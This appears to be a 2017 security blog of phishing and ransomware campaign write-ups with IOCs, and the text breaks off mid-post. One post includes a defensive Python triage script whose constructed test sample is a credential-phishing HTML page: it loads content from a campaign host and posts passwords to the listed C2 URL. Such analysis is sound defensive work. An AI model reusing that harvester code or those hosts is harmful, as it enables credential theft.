<b>Phish Central</b><br />
<br />
<b>NEWS: Another Spy Program Leaked onto the Dark Web, Second Web Attack Imminent</b> (posted 2017-06-05)<br />
The WannaCry ransomware infected over 300,000 computers worldwide, including those operated by the National Health Service of the UK, the Russian government and multi-billion dollar corporations, in merely a week. This week, several publications including the Financial Times and the Sun have reported that yet another global ransomware attack is imminent.<br />
<a href="https://www.deepdotweb.com/2017/06/03/another-spy-program-leaked-onto-dark-web-second-web-attack-imminent/?utm_source=hs_email&utm_medium=email&utm_content=52697792&_hsenc=p2ANqtz-9J0784BGYEvTn12BHZH-C4FQZDi7dbztsuIT2eG5ovQaClK6U9vLGxgumtN1js9byZzX7krMXLls_y7R1EOb6SgfRh3Q&_hsmi=52697792" target="_blank">Full story here.</a> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://agentmail.com.au/wp-content/uploads/data-numbers-ss-1920.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="800" height="360" src="https://agentmail.com.au/wp-content/uploads/data-numbers-ss-1920.jpg" width="640" /></a></div>
<br />
<b>NEWS: New tool for converting Shodan CSV into usable new files.</b> (posted 2017-05-30)<br />
This is a small script that converts the CSV downloaded from Shodan into a new CSV that can be ingested into other platforms (e.g. ThreatConnect). You can grab the IOC column (e.g. IPs) and create a new CSV file with just that column; this new CSV can then be ingested into any other platform.<br />
<a href="http://rakshatec.blogspot.com.au/2017/05/python-converting-shodan-csv-into-iocs.html" target="_blank">Read the full article here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-r4G2uNZnHas/WS3jR6ECM1I/AAAAAAAAMxQ/_X1c0dnQq5wa4jZUtfTRVY7MinyWAD6EQCLcB/s400/convert.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="285" data-original-width="400" height="285" src="https://4.bp.blogspot.com/-r4G2uNZnHas/WS3jR6ECM1I/AAAAAAAAMxQ/_X1c0dnQq5wa4jZUtfTRVY7MinyWAD6EQCLcB/s400/convert.png" width="400" /></a></div>
<br />
<b>NEWS: E-mails phished from Russian critic were “tainted” before being leaked</b> (posted 2017-05-29)<br />
ArsTechnica.com reports: E-mails stolen in a phishing attack on a prominent critic of Russian
President Vladimir Putin were manipulated before being published on the
Internet. That's according to a report published Thursday, which also
asserts that the e-mails were manipulated in order to discredit a steady
stream of unfavorable articles.<br />
<a href="https://arstechnica.com/security/2017/05/e-mails-phished-from-russian-critic-were-tainted-before-being-leaked/" target="_blank">Read the full story here.</a> <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://cdn.arstechnica.net/wp-content/uploads/2017/05/slatter-phish-800x488.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="488" data-original-width="800" height="243" src="https://cdn.arstechnica.net/wp-content/uploads/2017/05/slatter-phish-800x488.png" width="400" /></a></div>
<br />
<b>NEWS: New RansomWare WIDIA - asks for credit card payment</b> (posted 2017-05-25)<br />
New “Widia” Ransomware Asks for Credit Card for Payment.<br />
SentinelOne detects this malware behaviorally and our customers are protected despite the lack of significant, or apparent, malicious behavior.<br />
<a href="https://sentinelone.com/blogs/new-widia-ransomware-asks-credit-card-payment/" target="_blank">Full story here</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://sentinelone.com/wp-content/uploads/ransom.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="400" data-original-width="600" height="266" src="https://sentinelone.com/wp-content/uploads/ransom.gif" width="400" /></a></div>
<br />
<b>Phishing: JAFF ransomware | PDF | DOCM</b> (posted 2017-05-25)<br />
This campaign is serving Jaff Ransomware. The attachment is a PDF which has an embedded DOCM that calls out to the C2.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-zYSHKYV1YFA/WSdzfn-axGI/AAAAAAAAAIk/hbC0G0dQIb8YV3MygkNNV_LkfJVoTN2GwCLcB/s1600/Screen%2BShot%2B2017-05-26%2Bat%2B10.09.01%2Bam.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="604" data-original-width="860" height="280" src="https://2.bp.blogspot.com/-zYSHKYV1YFA/WSdzfn-axGI/AAAAAAAAAIk/hbC0G0dQIb8YV3MygkNNV_LkfJVoTN2GwCLcB/s400/Screen%2BShot%2B2017-05-26%2Bat%2B10.09.01%2Bam.png" width="400" /></a></div>
<br />
<b>Phishing: SCAM/Recon campaign</b> (posted 2017-05-25)<br />
This one tries to get you to contact the sender and start a conversation. Most likely a scam.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-2xECJXKFpIU/WSdzA_EB3UI/AAAAAAAAAIc/RDCzD8G7nBEGrLYJYIUgBPbM1xnEbYLkQCLcB/s1600/Screenshot%2Bfrom%2B2017-05-26%2B10-01-08.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="307" data-original-width="418" height="293" src="https://1.bp.blogspot.com/-2xECJXKFpIU/WSdzA_EB3UI/AAAAAAAAAIc/RDCzD8G7nBEGrLYJYIUgBPbM1xnEbYLkQCLcB/s400/Screenshot%2Bfrom%2B2017-05-26%2B10-01-08.png" width="400" /></a></div>
<br />
<b>Phishing: Jaff Ransomware campaign through PDF > DOCM</b> (posted 2017-05-17)<br />
Phishing emails with PDF attachments that contain an embedded DOCM have been doing the rounds.<br />
<div>
Decompressed DOCM:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-LSP3Jkz7TiA/WRwLbGILIEI/AAAAAAAAAIM/OCHd31zWVPgDi6-6iFRxYDY2QKVKsKP1ACLcB/s1600/Screen%2BShot%2B2017-05-17%2Bat%2B6.36.05%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="216" src="https://1.bp.blogspot.com/-LSP3Jkz7TiA/WRwLbGILIEI/AAAAAAAAAIM/OCHd31zWVPgDi6-6iFRxYDY2QKVKsKP1ACLcB/s400/Screen%2BShot%2B2017-05-17%2Bat%2B6.36.05%2Bpm.png" width="400" /></a></div>
<div>
Here's a list of known first stage URLs:<br />
<div>
<br /></div>
<div>
</div>
<div>
</div>
</div>
<br />
<b>Malware: Uiwix Ransomware - new ransomware variant</b> (posted 2017-05-15)<br />
WannaCry distribution may have dropped, but the ransomware pandemic is not over.<br />
Uiwix has begun to spread by exploiting the same vulnerability in Windows SMBv1 and SMBv2 as WannaCry used. Cyber criminals are quick to incorporate vulnerabilities, especially when they have the potential to infect a large number of targets like the EternalBlue exploit has.<br />
<br />
Read the full story here at <a href="https://heimdalsecurity.com/blog/security-alert-uiwix-ransomware/" target="_blank">HEIMDAL</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://heimdalsecurity.com/blog/wp-content/uploads/uiwix-ransom-note.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="322" src="https://heimdalsecurity.com/blog/wp-content/uploads/uiwix-ransom-note.png" width="400" /></a></div>
<br />
<b>Malware: WannaCry RansomWare - Infection Vector unlikely to be Phishing</b> (posted 2017-05-14)<br />
By now, the whole world has heard of the new ransomware WannaCry and its variants. Some of you might be wondering why there hasn't been anything posted here on this site regarding the phishing aspect of the campaign. The reason is quite simple. Unlike what many security vendors have reported, it is highly unlikely that the infection is being spread through phishing campaigns. The malware is targeting victims across the world based on the well-known SMBv1 vulnerability whose exploit was leaked by ShadowBrokers very recently. It looks like the internet is being scanned for vulnerable computers, which are then attacked with the malware.<br />
<br />
Easy wins: <a href="https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012" target="_blank">disable SMB</a>, and make sure you are not blocking the <a href="https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html" target="_blank">kill switch</a>.<br />
<br />
There is a lot of reporting around this now but most of it is just re-tweets and news stories which add little to nothing to the real campaign.<br />
<br />
Here's a good <a href="https://www.renditioninfosec.com/2017/05/wanacrypt0r-malware-webcast-and-slides/" target="_blank">RE paper</a> from Jake Williams on the payload.<br />
And here's the <a href="https://www.renditioninfosec.com/download-tear-stopper/" target="_blank">tool</a> that you can use to prevent WannaCry infections if you can't patch your systems.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Ih4_J8sN6HA/WRbMeMbz8oI/AAAAAAAAsno/3_kD2_hIGYkw9K-IthRu2_fdE_xSm1UhwCLcB/s1600/wannacry-ransomware-attack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="https://1.bp.blogspot.com/-Ih4_J8sN6HA/WRbMeMbz8oI/AAAAAAAAsno/3_kD2_hIGYkw9K-IthRu2_fdE_xSm1UhwCLcB/s640/wannacry-ransomware-attack.png" width="640" /></a></div>
<br />
<b>Phishing: PayPal theme 10 May 2017 | CredSteal</b> (posted 2017-05-09)<br />
This one is currently active. It tries to lure victims into downloading and opening an HTML file that opens locally in the browser but, when the 'submit' button is hit, POSTs the entered information back to the C2 online, provided the information matches the conditions in the script.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-RnPDSMxBlOo/WRI7BXupw_I/AAAAAAAAAHY/ktpLcZ9YR_8aT5367OepvoMGwatY7S50QCEw/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B7.26.17%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="230" src="https://1.bp.blogspot.com/-RnPDSMxBlOo/WRI7BXupw_I/AAAAAAAAAHY/ktpLcZ9YR_8aT5367OepvoMGwatY7S50QCEw/s640/Screen%2BShot%2B2017-05-10%2Bat%2B7.26.17%2Bam.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">This is what the email body looks like. </td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-VNw7jEFnYB0/WRI7BZaVRXI/AAAAAAAAAHY/15zzdAR697o8x4y56R_L1_nFzHuxTrajwCEw/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B7.26.29%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="261" src="https://3.bp.blogspot.com/-VNw7jEFnYB0/WRI7BZaVRXI/AAAAAAAAAHY/15zzdAR697o8x4y56R_L1_nFzHuxTrajwCEw/s320/Screen%2BShot%2B2017-05-10%2Bat%2B7.26.29%2Bam.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The HTML Attachment</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<div>
Clever JS in the background makes the connection. It is obfuscated. </div>
<div>
The actual HTML content only loads if internet is available. The JS fetches the page contents and then displays them in the browser. </div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-EPuGTYoW5Fg/WRI7CBx2HUI/AAAAAAAAAHY/5vKFRsUA2BYIv2Jt4eDwmIwRqZTLt_AFgCEw/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B7.27.56%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="223" src="https://3.bp.blogspot.com/-EPuGTYoW5Fg/WRI7CBx2HUI/AAAAAAAAAHY/5vKFRsUA2BYIv2Jt4eDwmIwRqZTLt_AFgCEw/s400/Screen%2BShot%2B2017-05-10%2Bat%2B7.27.56%2Bam.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Locally saved HTML, loaded into a browser with internet available</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
The actual content is served from this server: <b>www.infosec1.net</b></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-ALFfTZJN5NE/WRJBhyVvAqI/AAAAAAAAAHk/7WzNThQMjIALgT6KPDKkrOtIA_C4tfo-wCLcB/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B8.04.46%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="245" src="https://1.bp.blogspot.com/-ALFfTZJN5NE/WRJBhyVvAqI/AAAAAAAAAHk/7WzNThQMjIALgT6KPDKkrOtIA_C4tfo-wCLcB/s400/Screen%2BShot%2B2017-05-10%2Bat%2B8.04.46%2Bam.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">PCAP of the request in the background</td></tr>
</tbody></table>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-PILyO9tLmYY/WRJBiOUUJfI/AAAAAAAAAHo/r5PwtKyuBKo1XOwOsXnMmBS2VDy3wpqxgCLcB/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B8.06.14%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://3.bp.blogspot.com/-PILyO9tLmYY/WRJBiOUUJfI/AAAAAAAAAHo/r5PwtKyuBKo1XOwOsXnMmBS2VDy3wpqxgCLcB/s400/Screen%2BShot%2B2017-05-10%2Bat%2B8.06.14%2Bam.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The content served</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
The whole HTML is encrypted and is only decrypted on the fly in the browser. When decrypted, we can see the JS code that executes in the browser. </div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-gGiKCP3dUF8/WRI7D48yhbI/AAAAAAAAAHY/JkvOJOOeKUIvYWiG8EcXvn6TPqe9fd-jQCEw/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B7.31.13%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="275" src="https://2.bp.blogspot.com/-gGiKCP3dUF8/WRI7D48yhbI/AAAAAAAAAHY/JkvOJOOeKUIvYWiG8EcXvn6TPqe9fd-jQCEw/s400/Screen%2BShot%2B2017-05-10%2Bat%2B7.31.13%2Bam.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypted Code</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
The JS code is clever and checks for a few conditions. If the conditions are met, it POSTs the info to the C2 at http://www.<b>bootstrapcdn3.net</b>/e0445952.php; if they are not met, it redirects to the legitimate PayPal site. </div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-W2Z2JI4iF54/WRJBjFz_pVI/AAAAAAAAAH0/92nuNzbkNvY0NiQssVnt7SgUpGDlNNlFACLcB/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B8.22.31%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://1.bp.blogspot.com/-W2Z2JI4iF54/WRJBjFz_pVI/AAAAAAAAAH0/92nuNzbkNvY0NiQssVnt7SgUpGDlNNlFACLcB/s400/Screen%2BShot%2B2017-05-10%2Bat%2B8.22.31%2Bam.png" width="381" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">One of the conditions. </td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-ddZO5C9HiQ8/WRJBjJnkAPI/AAAAAAAAAHw/5-2QKndDcF8ao5Vee8w9wJWlM0GQUkshwCLcB/s1600/Screen%2BShot%2B2017-05-10%2Bat%2B8.22.14%2Bam.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://3.bp.blogspot.com/-ddZO5C9HiQ8/WRJBjJnkAPI/AAAAAAAAAHw/5-2QKndDcF8ao5Vee8w9wJWlM0GQUkshwCLcB/s400/Screen%2BShot%2B2017-05-10%2Bat%2B8.22.14%2Bam.png" width="382" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Final condition that directs the traffic</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>IOCs for this:</b></div>
<div>
www.infosec1.net</div>
<div>
www.bootstrapcdn3.net</div>
<div>
3061027594cf895b2e4a7ca0000f6bfe</div>
<div>
<br /></div>
<div>
Download the actual code <a href="https://drive.google.com/file/d/0B131CgkpMDDKWmRfNjFkemdueTg/view?usp=sharing" target="_blank">here</a>.<br />
Files included are:<br />
<i>initial.html</i><br />
<i>script.js</i><br />
<i>decrypted-code.html</i><br />
<br /></div>
<div>
:)</div>
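Added example (not the campaign's code and not the author's tooling): a small Python triage script for HTML attachments of this kind. It flags the traits described above, namely obfuscated JavaScript that fetches the real page from a remote host, a form that POSTs to a host unrelated to the imitated brand, and a fallback redirect to the genuine site. The sample attachment is constructed for the test and reuses the two hostnames listed as IOCs; the brand domain list is an assumption.

```python
"""Static triage of an HTML e-mail attachment (added example, not the campaign's code).

Looks for the traits the post describes: obfuscated JavaScript that pulls the real
page from a remote host, a form that submits to a host unrelated to the imitated
brand, and a redirect to the real brand site for input that fails the script's checks.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")
B64_LITERAL_RE = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")
FORM_ACTION_RE = re.compile(r"""<form[^>]*\baction=["']([^"']+)["']""", re.I)
# Calls commonly used to hide or assemble code and URLs at runtime.
OBFUSCATION_MARKERS = ("atob(", "unescape(", "eval(", "String.fromCharCode", "document.write(")
# Assumption: the brand the lure imitates; extend for other themes.
BRAND_DOMAINS = {"paypal.com"}


def registered_domain(host: str) -> str:
    """Naive eTLD+1 (last two labels); enough for .com/.net style hosts."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def extract_urls(html: str) -> set:
    """Collect plain URLs plus URLs hidden inside base64 string literals."""
    urls = set(URL_RE.findall(html))
    for literal in B64_LITERAL_RE.findall(html):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text: skip the literal
        urls.update(URL_RE.findall(decoded))
    return urls


def triage(html: str, brand_domains=BRAND_DOMAINS) -> dict:
    """Return the findings and a verdict for one HTML attachment."""
    findings = {}
    hosts = {h for h in (urlparse(u).hostname for u in extract_urls(html)) if h}
    off_brand = sorted(h for h in hosts if registered_domain(h) not in brand_domains)
    if off_brand:
        findings["off_brand_hosts"] = off_brand
    markers = [m for m in OBFUSCATION_MARKERS if m in html]
    if markers:
        findings["obfuscation_markers"] = markers
    off_brand_actions = []
    for action in FORM_ACTION_RE.findall(html):
        host = urlparse(action).hostname
        if host and registered_domain(host) not in brand_domains:
            off_brand_actions.append(action)
    if off_brand_actions:
        findings["form_posts_off_brand"] = off_brand_actions
    # Page body fetched at runtime and written into the document, as the post describes.
    if re.search(r"XMLHttpRequest|fetch\s*\(", html) and "document.write(" in html:
        findings["remote_content_injected"] = True
    # Brand site referenced (the redirect for non-matching input) while the form goes elsewhere.
    if off_brand_actions and any(registered_domain(h) in brand_domains for h in hosts):
        findings["brand_redirect_with_off_brand_post"] = True
    suspicious = bool(off_brand_actions) or (bool(off_brand) and len(markers) >= 2)
    return {"verdict": "suspicious" if suspicious else "clean", "findings": findings}


# Constructed sample mimicking the structure of the described attachment (not the real file).
_HIDDEN_URL = base64.b64encode(b"http://www.infosec1.net/").decode("ascii")
SAMPLE_HTML = f"""<html><head><title>PayPal</title><script>
var p = "{_HIDDEN_URL}";
var x = new XMLHttpRequest(); x.open("GET", atob(p), false); x.send();
document.write(unescape(x.responseText));
</script></head><body>
<form id="f" method="post" action="http://www.bootstrapcdn3.net/e0445952.php">
<input name="email"><input name="password" type="password"></form>
<script>function go() {{ if (!/@/.test(f.email.value)) location = "https://www.paypal.com/"; else f.submit(); }}</script>
</body></html>"""

# Constructed benign attachment for comparison: a plain notice linking to the real site.
BENIGN_HTML = """<html><body><p>Your statement is attached.</p>
<a href="https://www.paypal.com/myaccount">View on PayPal</a></body></html>"""

if __name__ == "__main__":
    print(triage(SAMPLE_HTML))
    print(triage(BENIGN_HTML))
```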
<b>TUTORIAL: Using Shodan CLI | Downloading malware IOCs</b> (posted 2017-05-09)<br />
I started using the Shodan CLI for personal research into malware C2 hosts and found the new Shodan tool MalwareHunter to be very helpful.<br />
Thought I'd share with you guys how I use the API to grab the IOCs and then convert the JSON report into a CSV, which could then be used in many ways.<br />
<br />
<a href="http://rakshatec.blogspot.com.au/2017/05/using-shodan-cli-downloading-malware.html" target="_blank">Read the full tutorial here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-tsP1yAcBcnQ/WRFzNAuZLdI/AAAAAAAAMvs/KX8nYkANw4wKWWNJ7jZYzCqcsMmadERGgCLcB/s640/Screen%2BShot%2B2017-05-09%2Bat%2B4.17.48%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="134" src="https://4.bp.blogspot.com/-tsP1yAcBcnQ/WRFzNAuZLdI/AAAAAAAAMvs/KX8nYkANw4wKWWNJ7jZYzCqcsMmadERGgCLcB/s640/Screen%2BShot%2B2017-05-09%2Bat%2B4.17.48%2Bpm.png" width="640" /></a></div>
<br />
<b>News: Shodan and Recorded Future release MalwareHunter, a C2 tracking tool</b> (posted 2017-05-03)<br />
Shodan.io and Recorded Future have announced a new C2 tracking tool, built into Shodan, that is accessible to anyone with a free Shodan.io account.<br />
<br />
Read info here: <a href="https://malware-hunter.shodan.io/" target="_blank">https://malware-hunter.shodan.io/</a><br />
<br />
Here is some more detail into what techniques they use: <a href="https://go.recordedfuture.com/hubfs/reports/threat-identification.pdf" target="_blank">https://go.recordedfuture.com/hubfs/reports/threat-identification.pdf</a><br />
<br />
In shodan.io, simply search using this: category:malware<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-tiCbIrZAIUE/WQpXZ09HuyI/AAAAAAAAAG4/7kOh60bOJMYor9ofsjV6tAgO7F36QA6CgCLcB/s1600/Screen%2BShot%2B2017-05-04%2Bat%2B8.11.59%2Bam.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="https://4.bp.blogspot.com/-tiCbIrZAIUE/WQpXZ09HuyI/AAAAAAAAAG4/7kOh60bOJMYor9ofsjV6tAgO7F36QA6CgCLcB/s640/Screen%2BShot%2B2017-05-04%2Bat%2B8.11.59%2Bam.png" style="cursor: move;" width="640" /></a></div>
<b>Phishing: FedEx themed campaign targeting EU</b> (posted 2017-05-01)<br />
This one is primarily targeted at Germany, but there are versions of this run targeting every corner of the world.<br />
I wasn't able to grab the actual landing page in this case as it 404'd by the time I saw this. But here's some info about the campaign anyway.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ylw3MoXdkwI/WQeoHc0uWvI/AAAAAAAAAGE/quxW0jT2FFMBeemEcBlPIW9MEoWHLlJ5wCLcB/s1600/Screen%2BShot%2B2017-05-02%2Bat%2B7.22.10%2Bam.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="297" src="https://1.bp.blogspot.com/-ylw3MoXdkwI/WQeoHc0uWvI/AAAAAAAAAGE/quxW0jT2FFMBeemEcBlPIW9MEoWHLlJ5wCLcB/s640/Screen%2BShot%2B2017-05-02%2Bat%2B7.22.10%2Bam.png" width="640" /></a></div>
<br />
Here are the actual URLs queried:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Il6-kXUgTAQ/WQeoi3-_xJI/AAAAAAAAAGI/FwGZuLaMdGIjhMq0YU0AnmhkL80w3KxLACLcB/s1600/Screen%2BShot%2B2017-05-02%2Bat%2B7.28.21%2Bam.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="102" src="https://3.bp.blogspot.com/-Il6-kXUgTAQ/WQeoi3-_xJI/AAAAAAAAAGI/FwGZuLaMdGIjhMq0YU0AnmhkL80w3KxLACLcB/s400/Screen%2BShot%2B2017-05-02%2Bat%2B7.28.21%2Bam.png" width="400" /></a></div>
<br />
As stated above, the landing page in this case 404'd, so I couldn't get more info on exactly what this campaign is serving, but anyway, good to know :)<br />
<br />
<br />
<b>News: Another Day, Another Obfuscation Technique</b> (posted 2017-04-28)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://isc.sans.edu/diaryimages/images/word20170428-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://isc.sans.edu/diaryimages/images/word20170428-1.png" /></a></div>
<br />
SANS ISC:<br />
We got many samples from our readers and we thank them for this. It helps us to find how attackers are improving their techniques to bypass security controls and to fool the victims. Often the provided samples are coming from common "waves" of spam but, sometimes, they are interesting. I'm also collecting pieces of malware via my honeypot and yesterday I detected a Word document with a very low score on VT:<br />
<br />
<a href="https://isc.sans.edu/forums/diary/Another+Day+Another+Obfuscation+Technique/22354/" target="_blank">Read the full story here.</a></div>
<br />
<b>News: Hacked: How $171 mn stolen from Union Bank was recovered</b> (posted 2017-04-27)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.thehindu.com/news/national/article18063937.ece/alternates/FREE_660/th16bank" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://www.thehindu.com/news/national/article18063937.ece/alternates/FREE_660/th16bank" height="370" width="640" /></a><br />
<br />
Details emerge of how the money was retrieved from accounts in four different countries after government intervention.<br />
<br />
<a href="http://www.thehindu.com/news/national/hacked-how-171-mn-stolen-from-union-bank-was-recovered/article18063938.ece">Read the entire story here</a>. </div>
<br />
<b>MalSpam: PDF with embedded DOCM | Invoice Theme</b> (posted 2017-04-27)<br />
This phishing campaign involved a PDF attachment (an invoice or something similar) that, when opened, drops a DOCM file, which in turn acts as the downloader. In the sample I analysed for this post, the PDF turned out to be corrupt, but the flow can still be seen.<br />
<br />
Yahoo did a good job of flagging the attachment as malicious; other providers might not be able to do so.<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-AjVWIp1zBEY/WQGxeYQu7xI/AAAAAAAAAFQ/Y-gO5TBRVeoU0tHpxuXNdfBHFgYhUc9ZgCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B8.08.21%2Bam.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://3.bp.blogspot.com/-AjVWIp1zBEY/WQGxeYQu7xI/AAAAAAAAAFQ/Y-gO5TBRVeoU0tHpxuXNdfBHFgYhUc9ZgCLcB/s640/Screen%2BShot%2B2017-04-27%2Bat%2B8.08.21%2Bam.png" width="640" /></a></div>
Here's the downloaded PDF:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-0JdYfE0UM0Y/WQGx0eOSb5I/AAAAAAAAAFU/1N3gyKAn-Xo5wwmLbepbkreE4J9LuVGtACLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.33.24%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://3.bp.blogspot.com/-0JdYfE0UM0Y/WQGx0eOSb5I/AAAAAAAAAFU/1N3gyKAn-Xo5wwmLbepbkreE4J9LuVGtACLcB/s320/Screen%2BShot%2B2017-04-27%2Bat%2B5.33.24%2Bpm.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://2.bp.blogspot.com/--eSuFV1JXwU/WQGyKHamq4I/AAAAAAAAAFo/IXqSotZHiW0HqmH_j6gS2nNIPKvXnbwCACLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.40.15%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://2.bp.blogspot.com/--eSuFV1JXwU/WQGyKHamq4I/AAAAAAAAAFo/IXqSotZHiW0HqmH_j6gS2nNIPKvXnbwCACLcB/s320/Screen%2BShot%2B2017-04-27%2Bat%2B5.40.15%2Bpm.png" width="320" /></a></div>
<br />
The start of the file:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
